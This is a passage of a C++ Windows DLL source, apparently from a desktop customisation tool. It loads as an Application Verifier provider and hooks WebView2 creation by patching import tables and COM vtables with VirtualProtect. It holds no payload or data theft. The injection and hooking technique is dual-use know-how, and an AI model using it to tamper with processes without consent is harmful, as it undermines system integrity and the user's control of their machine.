parentWindow = nullptr; 220 | createdController->get_ParentWindow(&parentWindow); 221 | ::SetLastError(0); 222 | __WndProc = reinterpret_cast(::GetWindowLongPtrW(parentWindow, GWLP_WNDPROC)); 223 | if (::GetLastError() == ERROR_SUCCESS && __WndProc) { 224 | ::SetWindowLongPtrW(parentWindow, GWLP_WNDPROC, reinterpret_cast(_WndProc)); 225 | } 226 | */ 227 | } 228 | 229 | //::MessageBoxW(nullptr, L"Hello from _ICoreWebView2CreateCoreWebView2ControllerCompletedHandler_Invoke", L"", 0); 230 | return __ICoreWebView2CreateCoreWebView2ControllerCompletedHandler_Invoke(_this, errorCode, createdController); 231 | } 232 | 233 | HRESULT(*__ICoreWebView2Environment_CreateCoreWebView2Controller)(ICoreWebView2Environment*, HWND, ICoreWebView2CreateCoreWebView2ControllerCompletedHandler*) = nullptr; 234 | HRESULT STDMETHODCALLTYPE _ICoreWebView2Environment_CreateCoreWebView2Controller(ICoreWebView2Environment* _this, HWND parentWindow, ICoreWebView2CreateCoreWebView2ControllerCompletedHandler* controllerCompletedHandler) { 235 | void** controllerCompletedHandlerVtbl = *(void***)controllerCompletedHandler; 236 | if (controllerCompletedHandlerVtbl[3] != _ICoreWebView2CreateCoreWebView2ControllerCompletedHandler_Invoke) { 237 | //::MessageBoxW(nullptr, L"Patching controllerCompletedHandlerVtbl", L"", 0); 238 | DWORD oldProtect = 0; 239 | if (::VirtualProtect(&controllerCompletedHandlerVtbl[3], sizeof(uintptr_t), PAGE_EXECUTE_READWRITE, &oldProtect)) { 240 | __ICoreWebView2CreateCoreWebView2ControllerCompletedHandler_Invoke = reinterpret_cast(controllerCompletedHandlerVtbl[3]); 241 | controllerCompletedHandlerVtbl[3] = _ICoreWebView2CreateCoreWebView2ControllerCompletedHandler_Invoke; 242 | ::VirtualProtect(&controllerCompletedHandlerVtbl[3], sizeof(uintptr_t), oldProtect, &oldProtect); 243 | } 244 | } 245 | 246 | //::MessageBoxW(nullptr, L"Hello from _ICoreWebView2Environment_CreateCoreWebView2Controller", L"", 0); 247 | return __ICoreWebView2Environment_CreateCoreWebView2Controller(_this, parentWindow, controllerCompletedHandler); 248 | } 249 | 250 | HRESULT(*__ICoreWebView2CreateCoreWebView2EnvironmentCompletedHandler_Invoke)(ICoreWebView2CreateCoreWebView2EnvironmentCompletedHandler* _this, HRESULT, ICoreWebView2Environment*) = nullptr; 251 | HRESULT STDMETHODCALLTYPE _ICoreWebView2CreateCoreWebView2EnvironmentCompletedHandler_Invoke(ICoreWebView2CreateCoreWebView2EnvironmentCompletedHandler* _this, HRESULT errorCode, ICoreWebView2Environment* createdEnvironment) { 252 | void** createdEnvironmentVtbl = *(void***)createdEnvironment; 253 | if (createdEnvironmentVtbl[3] != _ICoreWebView2Environment_CreateCoreWebView2Controller) { 254 | //::MessageBoxW(nullptr, L"Patching createdEnvironmentVtbl", L"", 0); 255 | DWORD oldProtect = 0; 256 | if (::VirtualProtect(&createdEnvironmentVtbl[3], sizeof(uintptr_t), PAGE_EXECUTE_READWRITE, &oldProtect)) { 257 | __ICoreWebView2Environment_CreateCoreWebView2Controller = reinterpret_cast(createdEnvironmentVtbl[3]); 258 | createdEnvironmentVtbl[3] = _ICoreWebView2Environment_CreateCoreWebView2Controller; 259 | ::VirtualProtect(&createdEnvironmentVtbl[3], sizeof(uintptr_t), oldProtect, &oldProtect); 260 | } 261 | } 262 | 263 | //::MessageBoxW(nullptr, L"Hello from _ICoreWebView2CreateCoreWebView2EnvironmentCompletedHandler_Invoke", L"", 0); 264 | return __ICoreWebView2CreateCoreWebView2EnvironmentCompletedHandler_Invoke(_this, errorCode, createdEnvironment); 265 | } 266 | 267 | HRESULT(*__CreateCoreWebView2EnvironmentWithOptions)(PCWSTR, PCWSTR, ICoreWebView2EnvironmentOptions*, ICoreWebView2CreateCoreWebView2EnvironmentCompletedHandler*) = nullptr; 268 | STDAPI _CreateCoreWebView2EnvironmentWithOptions(PCWSTR browserExecutableFolder, PCWSTR userDataFolder, ICoreWebView2EnvironmentOptions* environmentOptions, ICoreWebView2CreateCoreWebView2EnvironmentCompletedHandler* environmentCreatedHandler) { 269 | void** environmentCreatedHandlerVtbl = *(void***)environmentCreatedHandler; 270 | if (environmentCreatedHandlerVtbl[3] != _ICoreWebView2CreateCoreWebView2EnvironmentCompletedHandler_Invoke) { 271 | //::MessageBoxW(nullptr, L"Patching environmentCreatedHandlerVtbl", L"", 0); 272 | DWORD oldProtect = 0; 273 | if (::VirtualProtect(&environmentCreatedHandlerVtbl[3], sizeof(uintptr_t), PAGE_EXECUTE_READWRITE, &oldProtect)) { 274 | __ICoreWebView2CreateCoreWebView2EnvironmentCompletedHandler_Invoke = reinterpret_cast(environmentCreatedHandlerVtbl[3]); 275 | environmentCreatedHandlerVtbl[3] = _ICoreWebView2CreateCoreWebView2EnvironmentCompletedHandler_Invoke; 276 | ::VirtualProtect(&environmentCreatedHandlerVtbl[3], sizeof(uintptr_t), oldProtect, &oldProtect); 277 | } 278 | } 279 | 280 | if (!__CreateCoreWebView2EnvironmentWithOptions) { 281 | auto hMod = ::GetModuleHandleW(L"WebView2Loader.dll"); 282 | winrt::check_bool(hMod); 283 | __CreateCoreWebView2EnvironmentWithOptions = reinterpret_cast(::GetProcAddress(hMod, "CreateCoreWebView2EnvironmentWithOptions")); 284 | winrt::check_bool(__CreateCoreWebView2EnvironmentWithOptions); 285 | } 286 | //::MessageBoxW(nullptr, L"Hello from _CreateCoreWebView2EnvironmentWithOptions", L"", 0); 287 | return __CreateCoreWebView2EnvironmentWithOptions(browserExecutableFolder, userDataFolder, environmentOptions, environmentCreatedHandler); 288 | } 289 | #pragma endregion 290 | 291 | #pragma region "AppVerifier infrastructure" 292 | #define DLL_PROCESS_VERIFIER 4 293 | 294 | typedef struct _RTL_VERIFIER_THUNK_DESCRIPTOR { 295 | PCHAR ThunkName; 296 | PVOID ThunkOldAddress; 297 | PVOID ThunkNewAddress; 298 | } RTL_VERIFIER_THUNK_DESCRIPTOR, * PRTL_VERIFIER_THUNK_DESCRIPTOR; 299 | 300 | typedef struct _RTL_VERIFIER_DLL_DESCRIPTOR { 301 | PWCHAR DllName; 302 | ULONG DllFlags; 303 | PVOID DllAddress; 304 | PRTL_VERIFIER_THUNK_DESCRIPTOR DllThunks; 305 | } RTL_VERIFIER_DLL_DESCRIPTOR, * PRTL_VERIFIER_DLL_DESCRIPTOR; 306 | 307 | typedef void (NTAPI* RTL_VERIFIER_DLL_LOAD_CALLBACK) ( 308 | PWSTR DllName, 309 | PVOID DllBase, 310 | SIZE_T DllSize, 311 | PVOID Reserved); 312 | typedef void (NTAPI* RTL_VERIFIER_DLL_UNLOAD_CALLBACK) ( 313 | PWSTR DllName, 314 | PVOID DllBase, 315 | SIZE_T DllSize, 316 | PVOID Reserved); 317 | typedef void (NTAPI* RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK) ( 318 | PVOID AllocationBase, 319 | SIZE_T AllocationSize); 320 | 321 | typedef struct _RTL_VERIFIER_PROVIDER_DESCRIPTOR { 322 | ULONG Length; 323 | PRTL_VERIFIER_DLL_DESCRIPTOR ProviderDlls; 324 | RTL_VERIFIER_DLL_LOAD_CALLBACK ProviderDllLoadCallback; 325 | RTL_VERIFIER_DLL_UNLOAD_CALLBACK ProviderDllUnloadCallback; 326 | 327 | PWSTR VerifierImage; 328 | ULONG VerifierFlags; 329 | ULONG VerifierDebug; 330 | 331 | PVOID RtlpGetStackTraceAddress; 332 | PVOID RtlpDebugPageHeapCreate; 333 | PVOID RtlpDebugPageHeapDestroy; 334 | 335 | RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK ProviderNtdllHeapFreeCallback; 336 | } RTL_VERIFIER_PROVIDER_DESCRIPTOR; 337 | 338 | RTL_VERIFIER_DLL_DESCRIPTOR noHooks{}; 339 | RTL_VERIFIER_PROVIDER_DESCRIPTOR desc = { 340 | sizeof(desc), 341 | &noHooks, 342 | [](auto, auto, auto, auto) {}, 343 | [](auto, auto, auto, auto) {}, 344 | nullptr, 0, 0, 345 | nullptr, nullptr, nullptr, 346 | [](auto, auto) {}, 347 | }; 348 | #pragma endregion 349 | 350 | BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { 351 | UNREFERENCED_PARAMETER(lpvReserved); 352 | 353 | switch (fdwReason) { 354 | case DLL_PROCESS_ATTACH: 355 | ::DisableThreadLibraryCalls(hinstDLL); 356 | break; 357 | case DLL_THREAD_ATTACH: 358 | break; 359 | case DLL_THREAD_DETACH: 360 | break; 361 | case DLL_PROCESS_DETACH: 362 | break; 363 | case DLL_PROCESS_VERIFIER: 364 | *(PVOID*)lpvReserved = &desc; 365 | ::VnPatchIAT(::GetModuleHandleW(nullptr), "WebView2Loader.dll", "CreateCoreWebView2EnvironmentWithOptions", reinterpret_cast(_CreateCoreWebView2EnvironmentWithOptions)); 366 | ::VnPatchDelayIAT(::GetModuleHandleW(nullptr), "WebView2Loader.dll", "CreateCoreWebView2EnvironmentWithOptions", reinterpret_cast(_CreateCoreWebView2EnvironmentWithOptions)); 367 | break; 368 | } 369 | return true; 370 | } 371 | --------------------------------------------------------------------------------